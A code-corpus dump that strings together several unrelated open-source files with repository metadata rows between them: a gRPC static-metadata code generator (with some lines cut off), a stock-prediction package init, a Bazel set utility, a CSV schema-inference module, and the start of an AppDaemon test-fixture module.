val = ','.join(COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('grpc-accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
stream_compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
args = sys.argv[1:]
H = None
C = None
D = None
if args:
if 'header' in args:
H = sys.stdout
else:
H = open('/dev/null', 'w')
if 'source' in args:
C = sys.stdout
else:
C = open('/dev/null', 'w')
if 'dictionary' in args:
D = sys.stdout
else:
D = open('/dev/null', 'w')
else:
H = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.h'), 'w')
C = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.cc'), 'w')
D = open(
os.path.join(
os.path.dirname(sys.argv[0]),
'../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w')
with open(sys.argv[0]) as my_source:
copyright = []
for line in my_source:
if line[0] != '#':
break
for line in my_source:
if line[0] == '#':
copyright.append(line)
break
for line in my_source:
if line[0] != '#':
break
copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
    """Render a list of byte values as a double-quoted, C-style string.

    Printable ASCII bytes are emitted literally (with '"' backslash-escaped);
    every other byte becomes a \\xNN escape.
    """
    pieces = ['"']
    for byte in line:
        if 32 <= byte < 127:
            pieces.append('\\"' if byte == ord('"') else chr(byte))
        else:
            pieces.append('\\x%02X' % byte)
    pieces.append('"')
    return ''.join(pieces)
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '
print >> H, '
print >> H
print >> H, '
print >> H
print >> H, '
print >> H
print >> C, '
print >> C
print >> C, '
print >> C
print >> C, '
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def(i):
    # Emit the C initializer for static slice `i`: a pointer into the shared
    # refcount array plus an offset/length pair into the concatenated
    # `g_bytes` blob.  Relies on the module-level `id2strofs` (string index
    # -> byte offset) and `all_strs` tables.
    return ('{&grpc_static_metadata_refcounts[%d],'
            ' {{g_bytes+%d, %d}}}') % (i, id2strofs[i], len(all_strs[i]))
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
print >> H, '
print >> H, ('extern const grpc_slice '
'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];')
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '
mangle(elem).upper(), i)
print >> H
print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> C, 'static void static_ref(void *unused) {}'
print >> C, 'static void static_unref(void *unused) {}'
print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = '
'{static_ref, static_unref, grpc_slice_default_eq_impl, '
'grpc_slice_default_hash_impl};')
print >> H, ('extern const grpc_slice_refcount_vtable '
'grpc_static_metadata_vtable;')
print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = '
'{static_ref, static_unref, grpc_static_slice_eq, '
'grpc_static_slice_hash};')
print >> C, ('static grpc_slice_refcount static_sub_refcnt = '
'{&static_sub_vtable, &static_sub_refcnt};')
print >> H, ('extern grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];')
print >> C, ('grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {')
for i, elem in enumerate(all_strs):
print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},'
print >> C, '};'
print >> C
print >> H, '
print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == '
'&grpc_static_metadata_vtable)')
print >> H
print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]'
' = {')
for i, elem in enumerate(all_strs):
print >> C, slice_def(i) + ','
print >> C, '};'
print >> C
print >> H, '
print >> H, (' ((int)((static_slice).refcount - '
'grpc_static_metadata_refcounts))')
print >> H
print >> D, '
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '
print >> H, ('extern grpc_mdelem_data '
'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];')
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('
'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i)
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def str_idx(s):
    """Return the index of string `s` in the global `all_strs` table, or None."""
    return next((i for i, candidate in enumerate(all_strs) if candidate == s),
                None)
def md_idx(m):
    """Return the index of metadata pair `m` in the global `all_elems` table, or None."""
    return next((i for i, candidate in enumerate(all_elems) if candidate == m),
                None)
def offset_trials(mink):
    """Yield candidate hash offsets: 0 first, then -1, 1, -2, 2, ... up to 99.

    `mink` is accepted for interface compatibility but is not used.
    """
    yield 0
    for magnitude in range(1, 100):
        yield -magnitude
        yield magnitude
def perfect_hash(keys, name):
    """Build a perfect hash over `keys` via the `perfection` package.

    Returns a dict with the hash range and key count, a Python callable
    mirroring the generated hash, and the C source for `<name>_phash`.
    """
    p = perfection.hash_parameters(keys)
    def f(i, p=p):
        # Python mirror of the generated C hash (Python 2 integer division).
        i += p.offset
        x = i % p.t
        y = i / p.t
        return x + p.r[y]
    return {
        'PHASHRANGE': p.t - 1 + max(p.r),
        'PHASHNKEYS': len(p.slots),
        'pyfunc': f,
        'code': """
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
  i %(offset_sign)s= %(offset)d;
  uint32_t x = i %% %(t)d;
  uint32_t y = i / %(t)d;
  uint32_t h = x;
  if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
    uint32_t delta = (uint32_t)%(name)s_r[y];
    h += delta;
  }
  return h;
}
""" % {
            'name': name,
            # Missing displacement entries default to 0.
            'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
            't': p.t,
            'offset': abs(p.offset),
            'offset_sign': '+' if p.offset > 0 else '-'
        }
    }
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHRANGE'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for a, b in all_elems:
print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b)))
print >> C, '};'
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
print >> H, '
print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '
print >> H, '
H.close()
C.close()
| true
| true
|
f705aa0a9cc3013d4d6d764c543ef84eb33c842d
| 266
|
py
|
Python
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 1,761
|
2017-03-09T08:51:28.000Z
|
2022-03-27T18:15:06.000Z
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 38
|
2017-03-11T11:51:16.000Z
|
2021-06-27T15:00:07.000Z
|
bulbea/__init__.py
|
saimohithnaag/StockPredictor
|
4caba8f042f1d87ec0b41ec8e14d3a458a7409a4
|
[
"Apache-2.0"
] | 511
|
2017-03-12T03:49:26.000Z
|
2022-03-15T23:05:49.000Z
|
# imports - compatibility packages
from __future__ import absolute_import
# module imports
from bulbea.entity import Share, Stock
from bulbea.config import AppConfig
from bulbea.app import app
from bulbea.learn import sentiment
__version__ = AppConfig.VERSION
| 24.181818
| 38
| 0.819549
|
from __future__ import absolute_import
from bulbea.entity import Share, Stock
from bulbea.config import AppConfig
from bulbea.app import app
from bulbea.learn import sentiment
__version__ = AppConfig.VERSION
| true
| true
|
f705aa3f869f15ac85f262ae3734bf3603f18c56
| 2,656
|
bzl
|
Python
|
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
haskell/set.bzl
|
iphydf/rules_haskell
|
546c698cb782fd0749a3c91eb41e1f9a19c65646
|
[
"Apache-2.0"
] | null | null | null |
"""Immutable sets that support efficient merging, traversal, and membership
check.
"""
def _empty():
    """Return a brand-new set with no members."""
    return struct(_set_items = {})
def _is_member(s, e):
    """Report whether element `e` belongs to set `s`."""
    present = e in s._set_items
    return present
def _insert(s, e):
    """Return a copy of set `s` with element `e` added; `s` is untouched."""
    updated = dict(s._set_items)
    updated[e] = None
    return struct(_set_items = updated)
def _mutable_insert(s, e):
    """In-place variant of `set.insert`: add `e` to `s` and return `s`.

    Args:
      s: Set to insert the new element into.
      e: The element to insert.

    Result:
      The same set `s`, now containing `e`.
    """
    # Only the dict's keys carry meaning; None is a placeholder value.
    s._set_items[e] = None
    return s
def _union(s0, s1):
    """Return a new set holding every element of `s0` and of `s1`."""
    merged = dict(s0._set_items)
    merged.update(s1._set_items)
    return struct(_set_items = merged)
def _mutable_union(s0, s1):
    """In-place variant of `set.union`: fold `s1`'s elements into `s0`.

    Args:
      s0: Set that is modified in place.
      s1: Set whose elements are added to `s0`.

    Result:
      The same set `s0`, now containing the union of both sets.
    """
    s0._set_items.update(s1._set_items)
    return s0
def _map(s, f):
    """Return a new set built by applying `f` to every element of `s`.

    Elements whose images under `f` collide are collapsed into one.
    """
    mapped = { f(item): None for item in s._set_items.keys() }
    return struct(_set_items = mapped)
def _from_list(l):
    """Return a set containing the (deduplicated) elements of list `l`."""
    return struct(_set_items = { item: None for item in l })
def _to_list(s):
    """Convert set `s` into a list of its elements.

    Args:
      s: Set to convert.

    Returns:
      List of the set's elements (Starlark dict `.keys()` yields a list).
    """
    return s._set_items.keys()
def _to_depset(s):
    """Like `set.to_list`, but produces a depset.

    Args:
      s: Set to convert.

    Returns:
      Depset containing the set's elements.
    """
    return depset(_to_list(s))
# Exported namespace: callers access the operations above as `set.<op>`.
set = struct(
    empty = _empty,
    is_member = _is_member,
    insert = _insert,
    mutable_insert = _mutable_insert,
    union = _union,
    mutable_union = _mutable_union,
    map = _map,
    from_list = _from_list,
    to_list = _to_list,
    to_depset = _to_depset,
)
| 19.386861
| 75
| 0.636672
|
def _empty():
    """Create an empty set."""
    return struct(_set_items = dict())
def _is_member(s, e):
    """Return True if element `e` is in set `s`."""
    return e in s._set_items
def _insert(s, e):
    """Return a copy of set `s` with element `e` added."""
    r = dict(s._set_items)
    r[e] = None
    return struct(_set_items = r)
def _mutable_insert(s, e):
    """Add element `e` to set `s` in place; return `s`."""
    s._set_items[e] = None
    return s
def _union(s0, s1):
    """Return the union of sets `s0` and `s1` as a new set."""
    r = dict(s0._set_items)
    r.update(s1._set_items)
    return struct(_set_items = r)
def _mutable_union(s0, s1):
    """Fold `s1`'s elements into `s0` in place; return `s0`."""
    s0._set_items.update(s1._set_items)
    return s0
def _map(s, f):
    """Return a new set with `f` applied to every element of `s`."""
    return struct(_set_items = { f(x): None for x in s._set_items.keys()})
def _from_list(l):
    """Build a set from the elements of list `l` (duplicates collapse)."""
    return (struct(_set_items = { x: None for x in l }))
def _to_list(s):
    """Return the set's elements as a list."""
    return s._set_items.keys()
def _to_depset(s):
    """Return the set's elements as a depset."""
    return depset(_to_list(s))
# Exported namespace bundling the set operations above.
set = struct(
    empty = _empty,
    is_member = _is_member,
    insert = _insert,
    mutable_insert = _mutable_insert,
    union = _union,
    mutable_union = _mutable_union,
    map = _map,
    from_list = _from_list,
    to_list = _to_list,
    to_depset = _to_depset,
)
| true
| true
|
f705aa53c6355389b32f15c7666bdf8d321b755f
| 5,052
|
py
|
Python
|
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | null | null | null |
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | null | null | null |
singer_encodings/json_schema.py
|
INGCRENGIFO/singer-encodings
|
eec3d7276bbc209b3e0d3c5e2a46c223d69e45b1
|
[
"Apache-2.0"
] | 1
|
2021-05-25T14:00:25.000Z
|
2021-05-25T14:00:25.000Z
|
import re
from . import csv
SDC_SOURCE_FILE_COLUMN = "_sdc_source_file"
SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno"
# TODO: Add additional logging
# TODO: conn needs get_files and get_file_handle functions
def get_schema_for_table(conn, table_spec):
    """Discover a JSON schema for `table_spec` by sampling matching files.

    Returns {} when no files match the spec's prefix/pattern.  Otherwise
    returns an object schema whose properties are the sampled columns plus
    the framework's metadata columns (source file, line number, and the
    extra-values array).
    """
    matching_files = conn.get_files(table_spec['search_prefix'],
                                    table_spec['search_pattern'])
    if not matching_files:
        return {}
    sampled_rows = sample_files(conn, table_spec, matching_files)
    properties = generate_schema(sampled_rows, table_spec)
    # Metadata columns override any same-named sampled columns.
    properties[SDC_SOURCE_FILE_COLUMN] = {'type': 'string'}
    properties[SDC_SOURCE_LINENO_COLUMN] = {'type': 'integer'}
    properties[csv.SDC_EXTRA_COLUMN] = {'type': 'array',
                                        'items': {'type': 'string'}}
    return {
        'type': 'object',
        'properties': properties,
    }
def sample_file(conn, table_spec, f, sample_rate, max_records):
    """Collect up to `max_records` sample rows from one file.

    Every `sample_rate`-th row is kept; the `_sdc_extra` column is stripped
    from samples since it should not influence schema inference.

    Returns (empty_file, samples): `empty_file` is True when the file
    yielded no rows, in which case `samples` holds a single all-None row
    built from the reader's fieldnames so field selection still works.
    """
    # Fix: dropped the unused `table_name` / `plurality` locals that the
    # original computed and never read.
    samples = []
    file_handle = conn.get_file_handle(f)
    # Pass the file name and enable compression inference so gzipped files
    # are handled transparently.
    opts = {'key_properties': table_spec['key_properties'],
            'delimiter': table_spec['delimiter'],
            'encoding': table_spec.get('encoding', 'utf-8'),
            'file_name': f['filepath']}
    readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True)
    for reader in readers:
        current_row = 0
        for row in reader:
            if (current_row % sample_rate) == 0:
                if row.get(csv.SDC_EXTRA_COLUMN):
                    row.pop(csv.SDC_EXTRA_COLUMN)
                samples.append(row)
            current_row += 1
            if len(samples) >= max_records:
                break
    # Empty sample to show field selection, if needed.
    empty_file = False
    if len(samples) == 0:
        empty_file = True
        # Assumes all reader objects in readers have the same fieldnames;
        # NOTE(review): raises NameError if `readers` yielded no reader at
        # all — same as the original behavior.
        samples.append({name: None for name in reader.fieldnames})
    return (empty_file, samples)
# pylint: disable=too-many-arguments
def sample_files(conn, table_spec, files,
sample_rate=1, max_records=1000, max_files=5):
to_return = []
empty_samples = []
files_so_far = 0
sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True)
for f in sorted_files:
empty_file, samples = sample_file(conn, table_spec, f,
sample_rate, max_records)
if empty_file:
empty_samples += samples
else:
to_return += samples
files_so_far += 1
if files_so_far >= max_files:
break
if not any(to_return):
return empty_samples
return to_return
def infer(datum):
    """Return the inferred datatype name for a raw value.

    None or the empty string yields None (nothing to infer).  Values parseable
    as int are 'integer'; otherwise values parseable as float are 'number'
    (numbers are NOT floats, they are DECIMALS in the target schema);
    everything else is 'string'.
    """
    if datum is None or datum == '':
        return None
    # Order matters: int is tried before the wider float.
    for caster, type_name in ((int, 'integer'), (float, 'number')):
        try:
            caster(datum)
            return type_name
        except (ValueError, TypeError):
            pass
    return 'string'
def count_sample(sample, counts, table_spec):
    """Tally the inferred datatype of each column value in `sample`.

    `counts` maps column name -> {datatype: occurrences}; it is updated in
    place and also returned.  Columns listed in the table's `date_overrides`
    are always tallied as 'date-time'; values with no inferable type
    (None / empty string) are skipped.
    """
    date_overrides = table_spec.get('date_overrides', [])
    for column, raw_value in sample.items():
        tallies = counts.setdefault(column, {})
        if column in date_overrides:
            datatype = "date-time"
        else:
            datatype = infer(raw_value)
        if datatype is not None:
            tallies[datatype] = tallies.get(datatype, 0) + 1
    return counts
def pick_datatype(counts):
    """Choose a single datatype from a {datatype: occurrences} tally.

    Any 'date-time' sighting wins outright.  A column that is purely
    'integer' or purely 'number' keeps that type; a mix of exactly
    'integer' and 'number' widens to 'number'.  Everything else falls
    back to 'string'.
    """
    if counts.get('date-time', 0) > 0:
        return 'date-time'
    has_int = counts.get('integer', 0) > 0
    has_num = counts.get('number', 0) > 0
    if len(counts) == 1:
        if has_int:
            return 'integer'
        if has_num:
            return 'number'
    elif len(counts) == 2 and has_int and has_num:
        return 'number'
    return 'string'
def generate_schema(samples, table_spec):
    """Build per-column JSON-schema fragments from sampled rows.

    Tallies datatypes across all samples, picks a winner per column, then
    maps it to a schema snippet: 'date-time' columns get an `anyOf`
    (date-time string or plain string); every other type is nullable and
    additionally allows 'string' as a fallback.
    """
    counts = {}
    for sample in samples:
        # e.g. {'name': {'string': 45}}
        counts = count_sample(sample, counts, table_spec)
    for column, tallies in counts.items():
        chosen = pick_datatype(tallies)
        if chosen == 'date-time':
            counts[column] = {
                'anyOf': [
                    {'type': ['null', 'string'], 'format': 'date-time'},
                    {'type': ['null', 'string']}
                ]
            }
        else:
            permitted = ['null', chosen]
            if chosen != 'string':
                permitted.append('string')
            counts[column] = {
                'type': permitted,
            }
    return counts
| 26.87234
| 86
| 0.578583
|
import re
from . import csv
SDC_SOURCE_FILE_COLUMN = "_sdc_source_file"
SDC_SOURCE_LINENO_COLUMN = "_sdc_source_lineno"
def get_schema_for_table(conn, table_spec):
    """Sample files matching `table_spec` and return an inferred object schema.

    Returns {} when no files match.  Otherwise the schema's properties are
    the sampled columns plus the framework metadata columns (source file,
    line number, extra-values array), which override same-named columns.
    """
    files = conn.get_files(table_spec['search_prefix'], table_spec['search_pattern'])
    if not files:
        return {}
    samples = sample_files(conn, table_spec, files)
    data_schema = {
        **generate_schema(samples, table_spec),
        SDC_SOURCE_FILE_COLUMN: {'type': 'string'},
        SDC_SOURCE_LINENO_COLUMN: {'type': 'integer'},
        csv.SDC_EXTRA_COLUMN: {'type': 'array', 'items': {'type': 'string'}},
    }
    return {
        'type': 'object',
        'properties': data_schema,
    }
def sample_file(conn, table_spec, f, sample_rate, max_records):
    """Collect up to `max_records` sampled rows from file `f`.

    Keeps every `sample_rate`-th row and strips the `_sdc_extra` column.
    Returns (empty_file, samples); for an empty file, `samples` is a single
    all-None row built from the reader's fieldnames.
    """
    # NOTE(review): `table_name` and `plurality` are computed but never used.
    table_name = table_spec['table_name']
    plurality = "s" if sample_rate != 1 else ""
    samples = []
    file_handle = conn.get_file_handle(f)
    # File name + compression inference let gzipped files be read transparently.
    opts = {'key_properties': table_spec['key_properties'],
            'delimiter': table_spec['delimiter'],
            'encoding': table_spec.get('encoding', 'utf-8'),
            'file_name': f['filepath']}
    readers = csv.get_row_iterators(file_handle, options=opts, infer_compression=True)
    for reader in readers:
        current_row = 0
        for row in reader:
            if (current_row % sample_rate) == 0:
                if row.get(csv.SDC_EXTRA_COLUMN):
                    row.pop(csv.SDC_EXTRA_COLUMN)
                samples.append(row)
            current_row += 1
            if len(samples) >= max_records:
                break
    # Empty sample to show field selection, if needed.
    empty_file = False
    if len(samples) == 0:
        empty_file = True
        # Assumes all reader objects in readers have the same fieldnames.
        samples.append({name: None for name in reader.fieldnames})
    return (empty_file, samples)
def sample_files(conn, table_spec, files,
                 sample_rate=1, max_records=1000, max_files=5):
    """Sample rows from the newest files, stopping after `max_files` non-empty ones.

    Falls back to the synthetic all-None rows when every sampled file was empty.
    """
    to_return = []
    empty_samples = []
    files_so_far = 0
    # Newest files first, by modification time.
    sorted_files = sorted(files, key=lambda f: f['last_modified'], reverse=True)
    for f in sorted_files:
        empty_file, samples = sample_file(conn, table_spec, f,
                                          sample_rate, max_records)
        if empty_file:
            empty_samples += samples
        else:
            to_return += samples
            files_so_far += 1
        if files_so_far >= max_files:
            break
    # `any` is False for a list of empty dicts too, not just an empty list.
    if not any(to_return):
        return empty_samples
    return to_return
def infer(datum):
    """Return the inferred datatype name: 'integer', 'number', or 'string'.

    None or the empty string yields None (nothing to infer).
    """
    if datum is None or datum == '':
        return None
    try:
        int(datum)
        return 'integer'
    except (ValueError, TypeError):
        pass
    try:
        # Numbers are NOT floats, they are DECIMALS in the target schema.
        float(datum)
        return 'number'
    except (ValueError, TypeError):
        pass
    return 'string'
def count_sample(sample, counts, table_spec):
    """Tally each column's inferred datatype into `counts` (updated in place).

    Columns in the table's `date_overrides` are always tallied as
    'date-time'; values with no inferable type (None / empty) are skipped.
    """
    for key, value in sample.items():
        if key not in counts:
            counts[key] = {}
        date_overrides = table_spec.get('date_overrides', [])
        if key in date_overrides:
            datatype = "date-time"
        else:
            datatype = infer(value)
        if datatype is not None:
            counts[key][datatype] = counts[key].get(datatype, 0) + 1
    return counts
def pick_datatype(counts):
    """Choose one datatype from a {datatype: occurrences} tally.

    Any 'date-time' sighting wins outright.  A pure 'integer' or pure
    'number' column keeps that type; a mix of exactly 'integer' and
    'number' widens to 'number'; anything else falls back to 'string'.
    """
    to_return = 'string'
    if counts.get('date-time', 0) > 0:
        return 'date-time'
    if len(counts) == 1:
        if counts.get('integer', 0) > 0:
            to_return = 'integer'
        elif counts.get('number', 0) > 0:
            to_return = 'number'
    elif(len(counts) == 2 and
         counts.get('integer', 0) > 0 and
         counts.get('number', 0) > 0):
        to_return = 'number'
    return to_return
def generate_schema(samples, table_spec):
    """Turn sampled rows into per-column JSON-schema fragments.

    'date-time' columns become an `anyOf` of date-time/plain strings; other
    types are nullable and additionally allow 'string' as a fallback.
    """
    counts = {}
    for sample in samples:
        # e.g. {'name': {'string': 45}}
        counts = count_sample(sample, counts, table_spec)
    for key, value in counts.items():
        datatype = pick_datatype(value)
        if datatype == 'date-time':
            counts[key] = {
                'anyOf': [
                    {'type': ['null', 'string'], 'format': 'date-time'},
                    {'type': ['null', 'string']}
                ]
            }
        else:
            types = ['null', datatype]
            if datatype != 'string':
                types.append('string')
            counts[key] = {
                'type': types,
            }
    return counts
| true
| true
|
f705aa7a111c288e8e1467878b55832e0ecc8a3a
| 6,992
|
py
|
Python
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 37
|
2018-08-08T10:48:13.000Z
|
2022-03-09T22:31:11.000Z
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 58
|
2018-10-05T13:36:57.000Z
|
2022-02-06T11:37:20.000Z
|
appdaemontestframework/automation_fixture.py
|
fhoekstra/Appdaemon-Test-Framework
|
f4b3ed1145c83228cfe4e7cbc3e351b4ac975f86
|
[
"MIT"
] | 13
|
2018-12-04T19:22:23.000Z
|
2022-02-06T10:32:04.000Z
|
import warnings
from inspect import isfunction, signature
import pkg_resources
import pytest
from appdaemon.plugins.hass.hassapi import Hass
from appdaemontestframework.common import AppdaemonTestFrameworkError
class AutomationFixtureError(AppdaemonTestFrameworkError):
    """Raised when an automation fixture is declared or used incorrectly."""
    pass
def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks):
    """Run the user's fixture body, then build and initialize the automation.

    The positional `None`s are presumably placeholders for AppDaemon's
    runtime constructor arguments, which the mocked framework does not use —
    TODO confirm against appdaemon's Hass.__init__ signature.
    """
    _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks)
    automation = automation_class(
        None,
        automation_class.__name__,
        None,
        None,
        None,
        None,
        None
    )
    automation.initialize()
    # Wipe mock interactions recorded during initialize() so each test
    # starts from a clean slate.
    given_that.mock_functions_are_cleared()
    return automation
def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks):
injectable_fixtures = {
'given_that': given_that,
'hass_functions': hass_functions,
'hass_mocks': hass_mocks,
}
def _check_valid(param):
if param not in injectable_fixtures:
raise AutomationFixtureError(
f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}")
if param == 'hass_functions':
warnings.warn(
"""
Injecting `hass_functions` into automation fixtures is deprecated.
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions`
""",
DeprecationWarning)
args = []
for param in signature(function).parameters:
_check_valid(param)
args.append(injectable_fixtures.get(param))
function(*tuple(args))
def ensure_automation_is_valid(automation_class):
    """Fail fast with a descriptive error when `automation_class` cannot be
    used as an automation fixture.

    Checks, in order: an `initialize` method exists, it takes no arguments
    other than `self`, `__init__` is not overridden, and the class is a
    subclass of `Hass`.
    """
    cls_name = automation_class.__name__

    def has_function(func_name):
        return func_name in dir(automation_class)

    def takes_extra_arguments(func_name):
        params = signature(getattr(automation_class, func_name)).parameters
        return list(params.keys()) != ["self"]

    if not has_function('initialize'):
        raise AutomationFixtureError(
            f"'{cls_name}' has no 'initialize' function! Make sure you implemented it!")
    if takes_extra_arguments('initialize'):
        raise AutomationFixtureError(
            f"'{cls_name}' 'initialize' should have no arguments other than 'self'!")
    if '__init__' in automation_class.__dict__:
        raise AutomationFixtureError(f"'{cls_name}' should not override '__init__'")
    if not issubclass(automation_class, Hass):
        raise AutomationFixtureError(f"'{cls_name}' should be a subclass of 'Hass'")
class _AutomationFixtureDecoratorWithoutArgs:
    """Decorator used when `automation_fixture` receives bare automation classes.

    Wraps the user's fixture body in a pytest fixture parametrized over the
    classes; each parametrization yields an initialized automation instance.
    """
    def __init__(self, automation_classes):
        self.automation_classes = automation_classes
        # Validate up front so a malformed automation fails at decoration time.
        for automation in self.automation_classes:
